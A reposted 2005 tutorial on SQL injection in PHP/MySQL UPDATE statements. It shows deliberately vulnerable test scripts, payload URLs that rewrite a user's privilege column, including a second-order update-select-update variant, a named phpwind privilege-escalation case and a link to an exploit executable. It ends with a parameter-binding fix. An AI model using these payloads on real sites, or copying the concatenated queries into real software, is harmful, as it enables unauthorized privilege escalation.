Two patterns of UPDATE injection (MySQL + PHP)

Posted by WBOY on 2016-06-01 12:25:32

Author: SuperHei
Type: Original
Published: 2005-08-14

I. Test environment

OS: Windows XP SP2
php: php 4.3.10
mysql 4.1.9
apache 1.3.33

II. Test database structure

-- Database: `test`
--

-- --------------------------------------------------------

--
-- Table structure for table `userinfo`
--

CREATE TABLE `userinfo` (
`groudid` varchar(12) NOT NULL default '1',
`user` varchar(12) NOT NULL default 'heige',
`pass` varchar(122) NOT NULL default '123456'
) TYPE=MyISAM;

--
-- Dumping data for table `userinfo`
--

INSERT INTO `userinfo` VALUES ('2', 'heige', '123456');

III. Test patterns

1. Variable not wrapped in '' or ""

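<?php
//test1.php Mod1
// $p is taken straight from the request (?p=...); the script relies on register_globals
$servername = "localhost";
$dbusername = "root";
$dbpassword = "";
$dbname = "test";

// die() message: "Database connection failed"
mysql_connect($servername,$dbusername,$dbpassword) or die ("数据库连接失败");

$sql = "update userinfo set pass=$p where user='heige'"; // $p is inserted without quotes

$result = mysql_db_query($dbname, $sql);
$userinfo = mysql_fetch_array($result);

echo "

SQL Query:$sql

";
?>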

The script only changes the pass of user='heige'. If groudid represents the user's privilege level, our goal is to modify groudid by crafting $p, so we submit:

http://127.0.0.1/test1.php?p=123456,groudid=1

Query in MySQL:

mysql> select * from userinfo;
+---------+-------+--------+
| groudid | user  | pass   |
+---------+-------+--------+
| 1       | heige | 123456 |
+---------+-------+--------+
1 row in set (0.01 sec)

The groudid of user heige has been changed from 2 to 1 :)

So we can conclude that UPDATE injection succeeds when the variable is not wrapped in '' or "". This is our pattern 1.

2. Variable wrapped in '' or ""

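<?php
//test2.php
// $p is taken straight from the request (?p=...); the script relies on register_globals
$servername = "localhost";
$dbusername = "root";
$dbpassword = "";
$dbname = "test";

// die() message: "Database connection failed"
mysql_connect($servername,$dbusername,$dbpassword) or die ("数据库连接失败");

$sql = "update userinfo set pass='$p' where user='heige'"; // $p is wrapped in single quotes

$result = mysql_db_query($dbname, $sql);
$userinfo = mysql_fetch_array($result);

echo "

SQL Query:$sql

";
?>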

To close the ', $p should be constructed as 123456',groudid='2. Submit:

http://127.0.0.1/test2.php?p=123456',groudid='1

With gpc=on (magic_quotes_gpc), ' becomes \', and the submitted statement becomes:

SQL Query:update userinfo set pass='123456\',groudid=\'1' where user='heige'

Query in MySQL:

mysql> select * from userinfo;
+---------+-------+--------------------+
| groudid | user  | pass               |
+---------+-------+--------------------+
| 2       | heige | 123456',groudid='1 |
+---------+-------+--------------------+
1 row in set (0.00 sec)

groudid was not modified. So when the variable is wrapped in '' or "", is injection completely impossible? No. Let's look at pattern 2:

<?php
//test3.php Mod2
// $p is taken straight from the request (?p=...); the script relies on register_globals
$servername = "localhost";
$dbusername = "root";
$dbpassword = "";
$dbname = "test";

// die() message: "Database connection failed"
mysql_connect($servername,$dbusername,$dbpassword) or die ("数据库连接失败");

$sql = "update userinfo set pass='$p' where user='heige'";//

$result = mysql_db_query($dbname, $sql);
mysql_fetch_array($result); // the data in $p is written to the database

$sql= "select pass from userinfo where user='heige'";
$result = mysql_db_query($dbname, $sql);
$userinfo=mysql_fetch_array($result);

echo $userinfo[0]; // the queried pass value is held in $userinfo[0]

$sql ="update userinfo set pass='$userinfo[0]' where user='heige'";
$result = mysql_db_query($dbname, $sql);
mysql_fetch_array($result); // $userinfo[0] is used in a second update

?>

Let's test it. Submit:

http://127.0.0.1/test3.php?p=123456',groudid='1

Back in MySQL, query:

mysql> select * from userinfo;
+---------+-------+--------+
| groudid | user  | pass   |
+---------+-------+--------+
| 1       | heige | 123456 |
+---------+-------+--------+
1 row in set (0.00 sec)

HaHa~~ The injection succeeded and groudid was changed to 1. This is our pattern 2, which can be described simply as:

update --> select --> update
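
The update --> select --> update round trip above, as an added example that is not part of the original article: the concatenated flow of test3.php next to a version that binds every value. It assumes PHP 7+ with pdo_sqlite; an in-memory SQLite table stands in for the MySQL one, quote doubling stands in for magic_quotes_gpc, and the function names are hypothetical.

```php
<?php
// Added example (not from the original article). In-memory SQLite stands in
// for the article's MySQL table so the script runs without a server.
function freshDb(): PDO {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec("CREATE TABLE userinfo (groudid TEXT, user TEXT, pass TEXT)");
    $db->exec("INSERT INTO userinfo VALUES ('2', 'heige', '123456')");
    return $db;
}

function row(PDO $db): array {
    return $db->query("SELECT groudid, pass FROM userinfo WHERE user='heige'")
              ->fetch(PDO::FETCH_ASSOC);
}

// Pattern 2 as in test3.php: input is escaped once on the way in, then the
// stored value is read back and concatenated into a second UPDATE unescaped.
function roundTripConcatenated(PDO $db, string $p): array {
    $escaped = str_replace("'", "''", $p); // assumption: stand-in for magic_quotes_gpc
    $db->exec("UPDATE userinfo SET pass='$escaped' WHERE user='heige'");
    $stored = $db->query("SELECT pass FROM userinfo WHERE user='heige'")->fetchColumn();
    $db->exec("UPDATE userinfo SET pass='$stored' WHERE user='heige'");
    return row($db);
}

// Hardened form: every statement binds its values, including the one whose
// value came from the database rather than from the request.
function roundTripBound(PDO $db, string $p): array {
    $upd = $db->prepare("UPDATE userinfo SET pass = ? WHERE user = 'heige'");
    $upd->execute([$p]);
    $stored = $db->query("SELECT pass FROM userinfo WHERE user='heige'")->fetchColumn();
    $upd->execute([$stored]);
    return row($db);
}

$p = "123456',groudid='1"; // the value submitted to test3.php in the article
print_r(roundTripConcatenated(freshDb(), $p)); // groudid is rewritten by the second UPDATE
print_r(roundTripBound(freshDb(), $p));        // groudid is untouched; pass holds the literal string
```

Data read back from the database is as untrusted as the request that originally supplied it, so the second UPDATE needs the same parameter binding as the first.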

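IV. Real-world cases

Pattern 1: none available

Pattern 2: phpwind 2.0.2 and 3.31e privilege escalation vulnerability

Vulnerability analysis

update (profile.php; the injected variable is $proicon, which appears in the update statement as ,icon='$userdb[icon]')

select (jop.php)

update (jop.php)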

Exploit: http://www.huij.net/9xiao/up/phpwind-exploit.exe

V. Acknowledgements

Special thanks to saiy and other friends for their discussion and help. Thanks!!
